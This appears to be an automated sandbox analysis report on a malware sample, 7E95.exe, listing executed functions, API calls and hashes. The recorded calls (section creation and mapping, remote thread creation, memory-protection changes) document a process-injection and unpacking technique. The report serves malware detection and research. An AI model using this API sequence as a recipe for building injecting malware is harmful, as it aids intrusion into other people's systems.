GetThreadContext.KERNEL32(00000000,00000000), ref: 0041C2D2
FindAtomW.KERNEL32(00000000), ref: 0041C2D9
SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 0041C2FA
GetConsoleAliasW.KERNEL32(00000000,?,00000000,00000000), ref: 0041C30B
MoveFileW.KERNEL32(00000000,00000000), ref: 0041C313
DisconnectNamedPipe.KERNEL32(?), ref: 0041C322
ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0041C357
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 0041C367
OpenFileMappingA.KERNEL32(00000000,00000000,00000000), ref: 0041C379
GlobalAlloc.KERNEL32(00000000,0080651C), ref: 0041C38F
InterlockedDecrement.KERNEL32(?), ref: 0041C433
GetSystemTime.KERNEL32(00000000), ref: 0041C43B

Memory Dump Source

Source File: 00000005.00000002.1983099018.000000000040F000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_vdhivcv.jbxd

Similarity

API ID: Console$File$AliasAllocCommGlobalHandleInterlockedModuleOpenSystemThreadTime$AffinityAtomBuildCompareConfigContextCountDecrementDefaultDirectoryDisconnectExchangeExesFindFormatInfoLengthLocaleMappingMaskMoveNameNamedOutputPipeProcessReadStringTimerTypeWaitableWindowsWrite
String ID:
API String ID: 2854953312-0
Opcode ID: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
Instruction ID: c7d6ded2a409469651c71b0e0d077ad49e249c2ac0b9428d9b7779592f733872
Opcode Fuzzy Hash: 87ab2a57b8964d837c89f0e86aa00f89e0aa0f6be5dbe2d1e3f6e6aee76b549b
Instruction Fuzzy Hash: F5A162F2944304AFD314DF64DCC4EAB7BACFB8C308F00992EF54696161D73899558BA9

Analysis Process: 7E95.exePID: 5084, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	19.6%
Signature Coverage:	0%
Total number of Nodes:	143
Total number of Limit Nodes:	6

Executed Functions

Function 0040151A Relevance: 10.7, APIs: 7, Instructions: 202
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6cf608cc6a48ddb5cbcaf390370d6f737a37c0c60a6f8fd006ffe9db2db37fae
Instruction ID: 758367aa55518e9b0609bd9f996fee5d981b900bfb95b3b16150f351e66f2045
Opcode Fuzzy Hash: 6cf608cc6a48ddb5cbcaf390370d6f737a37c0c60a6f8fd006ffe9db2db37fae
Instruction Fuzzy Hash: 32614F71900204FBEB209F95DC49FAF7BB8FF85700F14412AFA12BA2E4D6749A05DB65

Function 004014DC Relevance: 10.7, APIs: 7, Instructions: 200
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$CreateDuplicateObject
String ID:
API String ID: 3617974760-0
Opcode ID: d18150f273f6ccb2de20f977413e906d5cd3d4fe8f62677aabc89b3c1d85e839
Instruction ID: 01edf16a583d4862d470478f25ad7e601c2cab9d889f12ca766ce5cb4c4dd08c
Opcode Fuzzy Hash: d18150f273f6ccb2de20f977413e906d5cd3d4fe8f62677aabc89b3c1d85e839
Instruction Fuzzy Hash: C4616BB1900205BFEB209F91CC49FAF7BB8FF85700F14412AFA12BA2E5D6759941CB24

Function 00401525 Relevance: 10.7, APIs: 7, Instructions: 172
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 03c546fdecbd4dabaee4adf1b6a307ad1c1ca8fb3c9340a70561610008c8f487
Instruction ID: d98608343e3f268f61e04ba58ef06da7a665d7d64d49ae776654abfe3b75af18
Opcode Fuzzy Hash: 03c546fdecbd4dabaee4adf1b6a307ad1c1ca8fb3c9340a70561610008c8f487
Instruction Fuzzy Hash: 1D514A71900204BBEB209F91CC89FAF7BB8FF85B00F14412AF912BA2E5D6759941CB24

Function 00401543 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7b7d6308fa4ba266436286a607709f1be1a66838caa3c92c62cfa2a56e0de30a
Instruction ID: d74f1d91fdd76053a65fad1b4a3cd82dad45149c469138b683230667d1d9e81f
Opcode Fuzzy Hash: 7b7d6308fa4ba266436286a607709f1be1a66838caa3c92c62cfa2a56e0de30a
Instruction Fuzzy Hash: 0C512971900204BBEB209F91CC49FAFBBB8FF85B00F144169FA11BA2E5D6759901CB24

Function 00401539 Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: be0b142dca8424e22e46bddfe0649438fd2993410129d82c934823231531ba28
Instruction ID: ab73f6be26f1869c353e243fb9bd1c98976a94d43ce8117269a76a7e75d45a71
Opcode Fuzzy Hash: be0b142dca8424e22e46bddfe0649438fd2993410129d82c934823231531ba28
Instruction Fuzzy Hash: C7512A71900204BFEB209F91DC49FAF7BB8FF85B00F144159F911BA2E5D6759941CB24

Function 00401547 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e92176b42270aac8b5331a90937cedd234a5388deceadf7c1319d5363699bff3
Instruction ID: bb1ffa6529b5e84b209e31d4d1803d42436e16298623707dd7286bb68b9f9455
Opcode Fuzzy Hash: e92176b42270aac8b5331a90937cedd234a5388deceadf7c1319d5363699bff3
Instruction Fuzzy Hash: FC5129B1900205BBEB209F91CC49FAFBBB8FF85B00F144129FA11BA2E5D6759941CB24

Function 0040154A Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 81221b2c84142187e1d35f3e591f8c940fc9a2008a3bf4f11d5effe31d7e480b
Instruction ID: 73889b9f897e247929119ec4d5a15b8180899db468f71b6cabb84e263ce8337d
Opcode Fuzzy Hash: 81221b2c84142187e1d35f3e591f8c940fc9a2008a3bf4f11d5effe31d7e480b
Instruction Fuzzy Hash: EB5118B1900209BFEB209F91DC89FEFBBB8FF85B00F144159F911BA2A5D6719941CB64

Function 00401558 Relevance: 10.7, APIs: 7, Instructions: 160
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401625
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401643
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401684
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B5
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6cb4cf7ec8c4aa9f352f3b2035ad9a7fad4858be555ae42f38005e902a6a77cf
Instruction ID: 49d8221448c3955a76666fa3ffd29bc600bb2af73250b349d1abf15cb38a88ba
Opcode Fuzzy Hash: 6cb4cf7ec8c4aa9f352f3b2035ad9a7fad4858be555ae42f38005e902a6a77cf
Instruction Fuzzy Hash: DE510875900209BBEB209F91DC48FAFBBB8FF85B10F144159F911BA2A5D6719940CB24

Function 00402F78 Relevance: 3.2, APIs: 2, Instructions: 208
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41bdb4e3576f522a12336801813d72270e18e7e689e52f62717f67e63f430c0
Instruction ID: 317511f5db5be22a1ba2fc0587e19514aeff4a670df2f05a3bf787a50cc01e0b
Opcode Fuzzy Hash: a41bdb4e3576f522a12336801813d72270e18e7e689e52f62717f67e63f430c0
Instruction Fuzzy Hash: D3514832618E098BC778EE2CA8496A377E1EB94351F1A437BD809D7389EF34D84187C5

Function 00402FD6 Relevance: 3.2, APIs: 2, Instructions: 167
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030FE
NtTerminateProcess.NTDLL ref: 0040310F

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: edc994cd46d5a812d08eeb49cc0d47fdc603a55ed17fcc0beff47836172b95c0
Instruction ID: daaa7f2e38d7aad3cc82e5be57a4a785f230c8f25ca3b67180aeecf2142c6842
Opcode Fuzzy Hash: edc994cd46d5a812d08eeb49cc0d47fdc603a55ed17fcc0beff47836172b95c0
Instruction Fuzzy Hash: C3412632618E084FD768EE6CA88966377D5E798311B16437AE809D3389EF34DC5187C5

Function 00403127 Relevance: 3.1, APIs: 2, Instructions: 90
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 004030FE
NtTerminateProcess.NTDLL ref: 0040310F

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 7d3e2b9648a9261650c6bc1a39b9e58fc6fc2dc5d5c75c30e08462082bd13ea6
Instruction ID: 2bca1af81f2e8b22f73ff0c878c7645be0435f849722be829624dba4d2441b2c
Opcode Fuzzy Hash: 7d3e2b9648a9261650c6bc1a39b9e58fc6fc2dc5d5c75c30e08462082bd13ea6
Instruction Fuzzy Hash: D3116A7150CB489AE324DF789889277BF99E74C326F28067FD081EA2C0C63D4646878B

Function 00401707 Relevance: 1.6, APIs: 1, Instructions: 81nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D7

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: c950319b117f7626d8f94a7f96971618ffb846fc13eca1edb7cc1ee4f19368c4
Instruction ID: 6fd82a02406858ea4bdd09e5f07fd8f1378e60a0efeacf51415e6c10d2a1a0e8
Opcode Fuzzy Hash: c950319b117f7626d8f94a7f96971618ffb846fc13eca1edb7cc1ee4f19368c4
Instruction Fuzzy Hash: E621CF36909100EBDB149A50DC84ABA73B5AB94700F38853BE843372F0E67C6843E69F

Function 0088003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0088024D

Strings

cess, xrefs: 0088018D
kernel32.dll, xrefs: 0088008F, 00880095

Memory Dump Source

Source File: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_880000_7E95.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: aac36b1d1735d88017c5ffbfa41392513043c77e30cf763340a148cb817e5263
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 3D527974A01229DFDBA4DF58C984BA8BBB1BF09304F1480D9E50DAB351DB30AE88DF15

Function 0041CDE0 Relevance: 4.6, APIs: 3, Instructions: 60
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(008088A0), ref: 0041CEBC
GetProcAddress.KERNEL32(00000000,00422E88), ref: 0041CEF9
VirtualProtect.KERNELBASE(008086E4,0080889C,00000040,?), ref: 0041CF19

Memory Dump Source

Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_7E95.jbxd

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 63e7f34a71685d7892ce337dae1720ac853fb232cfaf137423b4217087dad714
Instruction ID: 5e9b0be0c38538113afdd707655b30fe7f9fd3bb817dcaf521530bd74a9323a7
Opcode Fuzzy Hash: 63e7f34a71685d7892ce337dae1720ac853fb232cfaf137423b4217087dad714
Instruction Fuzzy Hash: 06312810618680EAF351DB28FE057123AA2BB65704F858079D5C88B3F1DBFA4599E72E

Function 00A3F98B Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00A3F9B3
Module32First.KERNEL32(00000000,00000224), ref: 00A3F9D3

Memory Dump Source

Source File: 00000007.00000002.2828537263.0000000000A3C000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3C000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a3c000_7E95.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: a340a932f82cbd297c5dc9a6c10f774d609247f1c9fa425a0fc1babf06cfb786
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 98F09032A10711BFDB203BF9AC8EB6EB6E8AF49724F100639F646911C0DB70EC454A61

Function 00880E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00880223,?,?), ref: 00880E19
SetErrorMode.KERNELBASE(00000000,?,?,00880223,?,?), ref: 00880E1E

Memory Dump Source

Source File: 00000007.00000002.2828242020.0000000000880000.00000040.00001000.00020000.00000000.sdmp, Offset: 00880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_880000_7E95.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: f2f6d8dcacfc00e91535e2c3d4d44eba824c5639ec75f1ad12dbbdf9da4bc129
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D6D0123114512877D7403A94DC09BCE7B1CDF05B62F008411FB0DD9080C770994047E5

Function 0041CF20 Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(008088A0,0041D513), ref: 0041CFAE

Memory Dump Source

Source File: 00000007.00000002.2827930401.0000000000410000.00000020.00000001.01000000.00000006.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_410000_7E95.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 024ab63b414873ef03464b928d0b8362a676f26a6441c26e9dd5149b43b9935a
Instruction ID: 64082fb71159e5cc311bf08b62d63a82f9138f51dc230dda9aa1e162ed46e083
Opcode Fuzzy Hash: 024ab63b414873ef03464b928d0b8362a676f26a6441c26e9dd5149b43b9935a
Instruction Fuzzy Hash: 03F06D04728640CAF784DB69FD1171222A2FFA8700F94E4399589C77F4EF7A4591C31E

Function 00401903 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 84f22a14fecf5131f0cebf7672270732d22fceb3ab4575de4c79c481780fc091
Instruction ID: 4c36ad83e294ba41db671b0a4fc56ed01a1a88e1cd5efd68717e2b465456e1b3
Opcode Fuzzy Hash: 84f22a14fecf5131f0cebf7672270732d22fceb3ab4575de4c79c481780fc091
Instruction Fuzzy Hash: FB11ADB2248305FAEB016A919C61EBA3725AB84725F304537FA13790F1857D8612F62F

Function 004018EC Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: f05674d040b89a3fd3233f146825ae66065897a8a3cb07f3275a079ef6497881
Instruction ID: d31a3e55155ec5b2861cda6a9190afa861277f927d9f51d2222c05ee6f2c8101
Opcode Fuzzy Hash: f05674d040b89a3fd3233f146825ae66065897a8a3cb07f3275a079ef6497881
Instruction Fuzzy Hash: 400180B224C205FAEB016A959C61E7A3629AB85724F304533FA53790F1857C8613F66F

Function 004018F8 Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 3fb263791fb83c8b8dbfce8bff536526753f8639889bf0faa2c122c60c7dff09
Instruction ID: 43af1caa6e1e2796d0d4d407fea188f58e1abde3d4da025ed4faa3eda81c6ada
Opcode Fuzzy Hash: 3fb263791fb83c8b8dbfce8bff536526753f8639889bf0faa2c122c60c7dff09
Instruction Fuzzy Hash: 8A018CB2248205EADB015AA19C61A793725AF89724F300533F643B90F2C53D8612E72F

Function 00401916 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 490e1bb7ca6da89293a755df55bde596f28f108899220f1f099bf28d0d415e7d
Instruction ID: aa4eb87d844f93062a1e7a8475ea347332f8cc58812ef86932872ada6f7bb1a9
Opcode Fuzzy Hash: 490e1bb7ca6da89293a755df55bde596f28f108899220f1f099bf28d0d415e7d
Instruction Fuzzy Hash: CE0162B2248205FBEB015A959C61E7D3726AB84715F304533F613790F2857D8613E62F

Function 0040191A Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 0040193B

Part of subcall function 0040151A: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D5
Part of subcall function 0040151A: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401602

Memory Dump Source

Source File: 00000007.00000002.2827895541.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_7E95.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 2e5cde1ac6b5fc222ffa5442979b07c8ac61913a661388b6ec45f8ca3ae79770
Instruction ID: e5bcf77e0712be884d61d54cd756556ba775c1addb04088e16cbc972d40e6034
Opcode Fuzzy Hash: 2e5cde1ac6b5fc222ffa5442979b07c8ac61913a661388b6ec45f8ca3ae79770
Instruction Fuzzy Hash: 970131B2248205FBEB006A959C61EBD3725AB54714F304533FA13790F6C57D8612EB6F

Function 0040191D Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON

